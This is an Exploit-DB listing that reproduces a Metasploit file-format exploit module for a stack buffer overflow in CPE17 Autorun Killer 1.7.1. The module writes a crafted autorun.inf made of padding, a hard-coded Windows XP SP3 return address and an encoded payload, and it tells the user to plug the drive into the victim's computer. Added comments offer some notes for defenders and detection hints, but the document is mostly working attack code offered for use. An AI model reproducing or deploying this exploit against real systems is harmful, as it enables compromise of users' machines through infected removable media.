CPE17 Autorun Killer 1.7.1 – Local Stack Buffer Overflow (Metasploit)

  • 作者: Xenithz xpt
    日期: 2012-04-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18792/
  • #
    # CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
    # by Xelenonz
    
    require 'msf/core'
    
    # Metasploit file-format module.  Despite inheriting from Exploit::Remote it
    # never contacts a host: #exploit writes a single crafted file to disk
    # (default name 'autorun.inf') whose body has the classic stack-smash layout
    #   [ 'A' * target['Offset'] ][ target.ret, 4 bytes little-endian ][ encoded payload ]
    #
    # Notes for defenders, all visible in the code below:
    #   * The only artefact produced is the file passed to file_create.  It is not
    #     INI text: it begins with a long run of 0x41 ('A') bytes, followed by the
    #     little-endian return address and an alphanumeric-encoded blob.  Because
    #     every byte is printable ASCII, a naive "is this text?" heuristic will not
    #     flag it; checking autorun.inf for INI syntax / repeated-byte runs will.
    #   * One hard-coded target only ('Windows XP SP3', Ret 0x775a676f, Offset 500).
    #   * 'DisablePayloadHandler' defaults to 'true', so the module is expected to
    #     run without a listener.
    class Metasploit3 < Msf::Exploit::Remote
    
    # FILEFORMAT mixin: provides file_create, used in #exploit to write the output.
    include Msf::Exploit::FILEFORMAT
    
    # Declares module metadata, the single target and the FILENAME option.
    #
    # @param info [Hash] metadata merged by update_info (framework convention)
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
    'Description'=> %q{
    readfile function is vulnerable it can be overflow
     },
    'Author' => [ 'Xelenonz' ],
    'Version'=> '0.1',
    
    # Encoder constraints declared as metadata: mixed-case alphanumeric encoder,
    # payload register ECX.  #exploit below builds its own encoder instance with
    # 'BufferRegister' => 'ESP', so the two declarations disagree; the explicit
    # datastore import in #exploit is presumably the one that takes effect —
    # confirm against the framework.
    'Payload'=>
    {
    'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
    										'EncoderOptions' => {'BufferRegister'=>'ECX'},
    },
    # No payload handler is started by default (string 'true', as written).
    			'DefaultOptions' =>
    				{
    			'DisablePayloadHandler' => 'true',
    				},
    'Platform' => 'windows',
    
    # Single target.  'Ret' is the 4-byte value written after the padding
    # (little-endian: 6f 67 5a 77 in the file); 'Offset' is the padding length.
    'Targets'=>
    [
    [
    	'Windows XP SP3',
    		{ 	'Ret' => 0x775a676f, 
    			'Offset' => 500 
    		} 
     ],
    
    ],
    'DefaultTarget' => 0,
    
    'Privileged' => false
    ))
    
    # Output file name; file_create writes to it.  Default is 'autorun.inf'.
    register_options(
    [
    	OptString.new('FILENAME', [ true, 'The file name.','autorun.inf']),
    ], self.class)
     end
    
     # Builds the file body and writes it via file_create.
     #
     # Layout (the three `buffer <<` lines): target['Offset'] padding bytes,
     # target.ret packed little-endian ('V'), then the re-encoded payload.
     def exploit
     	print_status("Encoding Payload ...")
    # A fresh x86/alpha_mixed encoder is created here and pointed at ESP,
    # overriding the ECX register declared in the 'Payload' metadata.
    enc = framework.encoders.create("x86/alpha_mixed")
    		enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
    		hunter = enc.encode(payload.encoded, nil, nil, platform)
    		buffer = ""
    buffer << "A"*target['Offset'] # padding offset
    buffer << [target.ret].pack('V') # jmp esp
    buffer << hunter # shellcode
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    # The file is the module's only output; nothing is sent to a host.
    file_create(buffer)
    print_status("Plug flashdrive to victim's computer")
    # With 'DisablePayloadHandler' defaulting to 'true' (see initialize) this is
    # presumably a no-op — confirm against the framework.
    handler
    
     end
    end